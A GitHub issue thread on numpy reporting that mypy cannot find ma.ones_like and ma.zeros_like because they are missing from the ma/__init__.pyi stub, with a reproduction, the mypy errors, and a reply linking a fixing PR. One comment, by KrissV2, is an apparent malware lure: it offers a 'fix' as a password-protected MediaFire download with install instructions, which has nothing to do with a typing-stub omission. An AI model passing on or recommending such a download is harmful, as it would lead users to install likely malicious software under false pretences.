### ISSUE TITLE
TYP: ma.ones_like and ma.zeros_like not found by mypy because missing in ma/__init__.pyi

### ISSUE THREAD

**Issue by sebschub** [numpy/numpy#27318]
### Describe the issue:

mypy produces for both, `ma.ones_like` and `ma.zeros_like` the `error: Module has no attribute`. The apparent reason is that both are not listed in `ma/__init__.pyi`. Is this a simple omission? `ma/core.pyi` includes both, though, so `ma.core.ones_like` or `ma.core.zeros_like` work.

### Reproduce the code example:

```python
import numpy as np
import numpy.ma as ma
import numpy.ma.core as mac

x: ma.MaskedArray = ma.MaskedArray([1.0, 3.0, 5.0])
# x = ma.MaskedArray([1.0, 3.0, 5.0])
print(ma.ones_like(x))
print(ma.zeros_like(x))

print(np.ones_like(x))

print(mac.ones_like(x))
print(mac.zeros_like(x))
```

### Error message:

```shell
test.py:7: error: Module has no attribute "ones_like"  [attr-defined]
test.py:8: error: Module has no attribute "zeros_like"  [attr-defined]
Found 2 errors in 1 file (checked 1 source file)
```

### Python and NumPy Versions:

2.1.0
3.12.5 (main, Aug  7 2024, 00:00:00) [GCC 14.2.1 20240801 (Red Hat 14.2.1-1)]

### Type-checker version and settings:

mypy 1.11.2 (compiled: yes)

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by luxedo** [comment]
The `ma` module is not completely typed yet.

There's already a list for typing (https://github.com/numpy/numpy/issues/26404) but I think that other functions may have slipped through.

I pushed a PR that solves this issue: https://github.com/numpy/numpy/pull/27323

**Comment by sebschub** [comment]
Thank you for the explanation and the PR!
